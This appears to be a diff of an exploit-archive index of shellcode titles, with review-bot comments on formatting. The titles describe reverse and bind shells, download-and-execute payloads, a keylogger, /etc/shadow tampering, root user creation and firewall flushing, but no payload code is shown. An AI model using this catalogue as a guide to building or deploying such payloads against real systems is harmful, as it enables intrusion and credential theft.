43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
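Review bot: In the new 40175 title, 'Windows/x86 (7)' puts a bare number in parentheses, which is the same shape as the duplicate counters used in this file (for example '(23 bytes) (1)'); a reader or a script splitting on parentheses cannot tell an OS version from a counter. Suggest spelling the version out, e.g. 'Windows/x86 (Windows 7)'. The '{shadow_passwd}' to '{passwd_shadow}' swap on 43563 and 43564 changes only the order of the two names; worth a word in the commit message on why.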
@ -613,11 +613,11 @@ id,file,description,date,author,type,platform
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) + Null-Free Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc
43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx
43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86
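Review bot: The '+' separator rule is applied to 43612 and 43616 here, but the trailing context row 43626 still reads 'Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode' with no '+' before the encoder name, while 43615 in the same hunk has '+ OSXPPCLongXOR Encoded'. Since this commit is a title normalisation pass, 43626 should be brought in line as well.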
@ -667,7 +667,7 @@ id,file,description,date,author,type,platform
43669,shellcodes/linux_x86/43669.c,"Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)",2009-01-01,bob,shellcode,linux_x86
43670,shellcodes/linux_x86/43670.c,"Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)",2009-01-01,bob,shellcode,linux_x86
43671,shellcodes/linux_x86/43671.c,"Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)",2009-01-01,bob,shellcode,linux_x86
43672,shellcodes/generator/43672.c,"Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
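Review bot: The 43672 change from 'socket-proxy' to 'Socket-proxy' capitalises only the first word, whereas the other titles in this file use title case for the payload description ('Bind TCP', 'Add User', 'Force Reboot'). Suggest 'Socket Proxy' or 'Socket-Proxy' so the row sorts and searches like its neighbours.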
@ -682,8 +682,8 @@ id,file,description,date,author,type,platform
43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43689,shellcodes/linux_x86/43689.c,"Linux/x86 - sync Shellcode (6 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43690,shellcodes/linux_x86/43690.c,"Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
43694,shellcodes/linux_x86/43694.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)",2018-01-14,"Hashim Jawad",shellcode,linux_x86
43695,shellcodes/linux_x86/43695.c,"Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)",2010-06-04,gunslinger_,shellcode,linux_x86
43696,shellcodes/linux_x86/43696.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)",2009-01-01,agix,shellcode,linux_x86
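Review bot: Removing the underscores from 43691 and 43692 leaves the string argument in 'setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!)' unquoted, while the context rows 43690 'execve(/bin/sh_ -c_ ping localhost)' and 43696 'chmod(/etc/shadow_ 0666)' still use the underscore as a comma stand-in. Please state the convention once (underscore means comma, quotes are dropped) so later edits do not reintroduce the mixed form.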
@ -691,8 +691,7 @@ id,file,description,date,author,type,platform
43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
43699,shellcodes/linux_x86/43699.c,"Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
43700,shellcodes/linux_x86/43700.c,"Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
43701,shellcodes/linux_x86/43701.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,"John Babio",shellcode,linux_x86
43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)",2009-01-01,Kernel_Panik,shellcode,linux_x86
43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,Kernel_Panik,shellcode,linux_x86
43703,shellcodes/linux_x86/43703.c,"Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)",2009-01-01,Chroniccommand,shellcode,linux_x86
43704,shellcodes/linux_x86/43704.c,"Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
43705,shellcodes/linux_x86/43705.c,"Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
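Review bot: This hunk drops the 43701 row entirely and renumbers 43702 from '(21 bytes) (5)' to '(21 bytes) (3)', but nothing visible here shows shellcodes/linux_x86/43701.c being removed or explains why the entry goes. Confirm the file is deleted in the same commit so the index and the tree stay in step, and recheck the duplicate counters: the next hunk adds 43735 as '(21 bytes) (6)', so the sequence needs a (4) and a (5) somewhere else in the file.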
@ -708,42 +707,82 @@ id,file,description,date,author,type,platform
43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43737,shellcodes/linux_x86/43737.c,"Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43738,shellcodes/linux_x86/43738.c,"Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator
43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86
43743,shellcodes/linux_x86/43743.c,"Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)",2009-01-01,"Hamid Zamani",shellcode,linux_x86
43744,shellcodes/linux_x86/43744.c,"Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)",2013-05-28,"Russell Willis",shellcode,linux_x86
43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind TCP Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86
43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Admin User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
43762,shellcodes/windows_x86/43762.c,"Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)",2009-01-01,OpTix,shellcode,windows_x86
43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86
43764,shellcodes/windows_x86/43764.c,"Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)",2009-01-01,cr4wl3r,shellcode,windows_x86
43765,shellcodes/windows_x86/43765.c,"Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)",2009-01-01,agix,shellcode,windows_x86
43766,shellcodes/windows_x86/43766.asm,"Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)",2009-01-01,Skylined,shellcode,windows_x86
43767,shellcodes/windows_x86/43767.asm,"Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)",2009-01-01,Skylined,shellcode,windows_x86
43768,shellcodes/windows_x86/43768.asm,"Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)",2009-01-01,Skylined,shellcode,windows_x86
43769,shellcodes/windows_x86/43769.c,"Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43770,shellcodes/windows_x86/43770.c,"Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43771,shellcodes/windows_x86/43771.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43772,shellcodes/windows_x86/43772.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41381,shellcodes/windows_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
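Review bot: The rename of 40872 to "Reverse TCP Netcat + mkfifo ..." is not carried through to 41509 and 41510 later in this hunk, which still read "Reverse Netcat Shell", so the same technique ends up titled two ways. Either rename those two rows in the same change or leave 40872 as it was. Also in this hunk, 41510 points at shellcodes/linux_x86-64/41510.nsam while its neighbours use .nasm; confirm the file on disk really has that extension, since the CSV path is what tooling uses to locate it.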
@ -765,7 +804,7 @@ id,file,description,date,author,type,platform
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
